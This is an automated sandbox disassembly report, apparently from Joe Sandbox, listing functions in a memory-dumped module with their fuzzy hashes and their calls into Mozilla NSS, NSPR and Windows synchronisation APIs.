Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: fe6db618bd03824cbb9da722212d09ec281a378366d1babb0faec3c2dbef6ab0
Instruction ID: 085a0a648b65d751213c7d561ae7b45e4850ddf8673f487b4ef94c2d547bbb94
Opcode Fuzzy Hash: fe6db618bd03824cbb9da722212d09ec281a378366d1babb0faec3c2dbef6ab0
Instruction Fuzzy Hash: 24716871A08314CFDB10CF9AC5C068AB7B4FF49719F25816DD959ABB41D770A902CF94

Function 6C516D2E Relevance: 7.6, APIs: 5, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6C503C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C503C66
Part of subcall function 6C503C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C503D04

memcpy.VCRUNTIME140(?,?,?), ref: 6C516DC0
memcpy.VCRUNTIME140(?,?,?), ref: 6C516DE5

Part of subcall function 6C518010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C51807D
Part of subcall function 6C518010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5180D1
Part of subcall function 6C518010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C51810E
Part of subcall function 6C518010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C518140

memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C516E7E
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C516E96
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C516EC2

Part of subcall function 6C517D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C517E27
Part of subcall function 6C517D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C517E67

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$memcpy$_byteswap_ushort
String ID:
API String ID: 3070372028-0
Opcode ID: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
Instruction ID: 228b2fdc6f2f4c716238cfc82b6646fc0b6702f1817d2fcf8374fd505f70fe47
Opcode Fuzzy Hash: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
Instruction Fuzzy Hash: C35191715083519FD724CF29C854B6ABBE5FFC9318F04895DE8A987B41E730E918CB92

Function 6C58DFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6C58AB10: DeleteCriticalSection.KERNEL32(D958E852,6C591397,5B5F5EC0,?,?,6C58B1EE,2404110F,?,?), ref: 6C58AB3C
Part of subcall function 6C58AB10: free.MOZGLUE(D958E836,?,6C58B1EE,2404110F,?,?), ref: 6C58AB49
Part of subcall function 6C58AB10: DeleteCriticalSection.KERNEL32(5D5E6C78), ref: 6C58AB5C
Part of subcall function 6C58AB10: free.MOZGLUE(5D5E6C6C), ref: 6C58AB63
Part of subcall function 6C58AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C58AB6F
Part of subcall function 6C58AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C58AB76

TlsGetValue.KERNEL32(?,?,6C58B266,6C5915C6,?,?,6C5915C6), ref: 6C58DFDA
EnterCriticalSection.KERNEL32(?,?,?,6C58B266,6C5915C6,?,?,6C5915C6), ref: 6C58DFF3
PK11_IsFriendly.NSS3(?,?,?,?,6C58B266,6C5915C6,?,?,6C5915C6), ref: 6C58E029
PK11_IsLoggedIn.NSS3 ref: 6C58E046

Part of subcall function 6C598F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C598FAF
Part of subcall function 6C598F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C598FD1
Part of subcall function 6C598F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C598FFA
Part of subcall function 6C598F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C599013
Part of subcall function 6C598F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C599042
Part of subcall function 6C598F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C59905A
Part of subcall function 6C598F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C599073
Part of subcall function 6C598F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C599111

PR_Unlock.NSS3(?,?,?,?,6C58B266,6C5915C6,?,?,6C5915C6), ref: 6C58E149

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
String ID:
API String ID: 4224391822-0
Opcode ID: 7b4b500fa5fa9c7dbe4caba19ff42240402530ac40657ee680eaa95fd75e34ab
Instruction ID: ff7b2bd70c027672491240a8c12de989b5e6cb82089ada143803b534f2204939
Opcode Fuzzy Hash: 7b4b500fa5fa9c7dbe4caba19ff42240402530ac40657ee680eaa95fd75e34ab
Instruction Fuzzy Hash: 9B515878602621CFDB10DF29C88476ABBF1BF84319F19885CD8998BB41D775E884CBC2

Function 6C59BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C59BF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C59BF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6C579F71,?,?,00000000), ref: 6C59BF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6C59BFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C59C014

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 6e803f009b874f891658c9cdacdb2f21a1cc2ea0c53b242d43af58aa7db018f8
Instruction ID: 372bac686c9ae9cc72bf5f1f83bc7952db3ab54eee4199cb6aaae6962d7c740d
Opcode Fuzzy Hash: 6e803f009b874f891658c9cdacdb2f21a1cc2ea0c53b242d43af58aa7db018f8
Instruction Fuzzy Hash: 4D41D775A012459BFB10EE66CC80BBE73B9AF85208F144168E91AD7B41FB31ED45CBE1

Function 6C56EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C56EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C56EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C56EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C56EEEB
free.MOZGLUE(?), ref: 6C56EEF6

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 9c1b0e4080592587ce442c7624015047a64c2ce7028f961fbadb8ce79f2c487f
Instruction ID: 4b5e621288c241ec96a9f0b1fa475c98f38ededcdb33811b5748c677be4e8e5f
Opcode Fuzzy Hash: 9c1b0e4080592587ce442c7624015047a64c2ce7028f961fbadb8ce79f2c487f
Instruction Fuzzy Hash: 3A310771A01600ABEB209F2BCC84B667BF4FB46714F140529E85A87E60D7B1ED14CBE5

Function 6C581F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C581F1C

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C699EBC), ref: 6C581FB8
SEC_ASN1EncodeItem_Util.NSS3(6C699E9C,?,?,6C699E9C), ref: 6C58200A
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C582020

Part of subcall function 6C576A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C57AD50,?,?), ref: 6C576A98

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C582030

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
String ID:
API String ID: 1390266749-0
Opcode ID: ede6589471c3359af2bec0e36032b019758dbeef699b42f4b0f0c98068af7da7
Instruction ID: 96fcf44d3d50082a0f776474ab90364eac507e94dc4ad45078d5a1979db50154
Opcode Fuzzy Hash: ede6589471c3359af2bec0e36032b019758dbeef699b42f4b0f0c98068af7da7
Instruction Fuzzy Hash: 7021D775902616EBE7118A15DC40FAB7B68FF8131CF140625E83996F80E732F968CBB1

Function 6C571DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C571E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C571E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C571E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C571E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C571EAD

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: 06f4692525ddd069e1aaafd2d3f86a210f860123a341dd490431fde540e5c100
Instruction ID: b7707871f3e001ed6e20fc44d99b600c4a05aed9967c6737a12746feee53a923
Opcode Fuzzy Hash: 06f4692525ddd069e1aaafd2d3f86a210f860123a341dd490431fde540e5c100
Instruction Fuzzy Hash: 68210372E08310A7D710CE68DC51B8B77A49BC5328F144638ED6D5BB80E730DD8887E6

Function 6C591850 Relevance: 7.6, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?,?,6C59002B,?), ref: 6C591875

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

TlsGetValue.KERNEL32(?,?,6C59002B,?), ref: 6C59188E
EnterCriticalSection.KERNEL32(?,?,?,6C59002B,?), ref: 6C5918A7
PR_ExitMonitor.NSS3(?,?,?,?,6C59002B,?), ref: 6C591905
PR_Unlock.NSS3(?,?,?,?,6C59002B,?), ref: 6C591912

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: f34d23180c925fe491b5bd7f553415581fd06c9504f72eb26c5fdfdfbcbdfe32
Instruction ID: aa98d1bd02044d5d66c50b0f19a40bd0f2a0f3b38720b84a64dc234e7693728f
Opcode Fuzzy Hash: f34d23180c925fe491b5bd7f553415581fd06c9504f72eb26c5fdfdfbcbdfe32
Instruction Fuzzy Hash: 6B218374A046659BDB00EF79C5C465AB7F8FF06318F104A69D894C7B00E730E894CBD2

Function 6C681E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C681E5C

Part of subcall function 6C639BF0: TlsGetValue.KERNEL32(?,?,?,6C680A75), ref: 6C639C07

PR_Lock.NSS3(00000000), ref: 6C681E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C681EAB
PR_GetCurrentThread.NSS3 ref: 6C681ED0
PR_Unlock.NSS3(?), ref: 6C681EE8

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: 3c9af571aa3078724d58cb6f9314832a4897e333c681303053ef7f16ae7ed905
Instruction ID: add7b1ffd121db7eef11a3fc6a6a7bf663086cb8ea9dbbe8bbdaa71283938f58
Opcode Fuzzy Hash: 3c9af571aa3078724d58cb6f9314832a4897e333c681303053ef7f16ae7ed905
Instruction Fuzzy Hash: FE21D074A16622AFD710CF19D844A46B7B0FF45718B258229E82A9BF40D730FC52CBF9

Function 6C5CBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C57E708,00000000,00000000,00000004,00000000), ref: 6C5CBE6A

Part of subcall function 6C5D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D08B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5804DC,?), ref: 6C5CBE7E

Part of subcall function 6C5CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5C8D2D,?,00000000,?), ref: 6C5CFB85
Part of subcall function 6C5CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5CFBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5CBEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5804DC,?,?), ref: 6C5CBED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5CBEEB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: 54c6c053ca9bd4c4d88c1da31cf6c57895a9b503355724d40824e5846a78ec38
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: 8C11EFB6B04255A7E700A9E9AC80F6B736D9B81B58F04412DFE0587B52E761DC08C6E3

Function 6C57AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C573FFF,00000000,?,?,?,?,?,6C571A1C,00000000,00000000), ref: 6C57ADA7

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C573FFF,00000000,?,?,?,?,?,6C571A1C,00000000,00000000), ref: 6C57ADB4

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C573FFF,?,?,?,?,6C573FFF,00000000,?,?,?,?,?,6C571A1C,00000000), ref: 6C57ADD5

Part of subcall function 6C5CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5C8D2D,?,00000000,?), ref: 6C5CFB85
Part of subcall function 6C5CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6994B0,?,?,?,?,?,?,?,?,6C573FFF,00000000,?), ref: 6C57ADEC

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C573FFF), ref: 6C57AE3C

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: aa99d85cedbbedf36da610b072fad873bf75e9e0970530d17260228d3d10aba2
Instruction ID: 799c309de1142c76b4dcee9773dbd9dab0ccbd10d9c7e0ef5a7e55cc00a09259
Opcode Fuzzy Hash: aa99d85cedbbedf36da610b072fad873bf75e9e0970530d17260228d3d10aba2
Instruction Fuzzy Hash: EF113B71E003055BE7209B699C41BBF73B8DFD125DF045628EC1996741FB20E99886F6

Function 6C588FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C590710), ref: 6C588FF1
PR_CallOnce.NSS3(6C6D2158,6C589150,00000000,?,?,?,6C589138,?,6C590710), ref: 6C589029
calloc.MOZGLUE(00000001,00000000,?,?,6C590710), ref: 6C58904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C590710), ref: 6C589066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C590710), ref: 6C589078

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 38def8cd217bdba2de578decc7a42954268a0add8332ad99109304fe3441761b
Instruction ID: 51700833ade1c635b9f526b3768efc70d5407d013495f747dd801ffddae17a9e
Opcode Fuzzy Hash: 38def8cd217bdba2de578decc7a42954268a0add8332ad99109304fe3441761b
Instruction Fuzzy Hash: C9112671702171A7EB205AAEAC44AAA32ACEB827ADF500531FD48D6B40F753CD45C7F9

Function 6C59CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C5B1E10: TlsGetValue.KERNEL32 ref: 6C5B1E36
Part of subcall function 6C5B1E10: EnterCriticalSection.KERNEL32(?,?,?,6C58B1EE,2404110F,?,?), ref: 6C5B1E4B
Part of subcall function 6C5B1E10: PR_Unlock.NSS3 ref: 6C5B1E76

free.MOZGLUE(?,6C59D079,00000000,00000001), ref: 6C59CDA5
PK11_FreeSymKey.NSS3(?,6C59D079,00000000,00000001), ref: 6C59CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C59D079,00000000,00000001), ref: 6C59CDCF
DeleteCriticalSection.KERNEL32(?,6C59D079,00000000,00000001), ref: 6C59CDE2
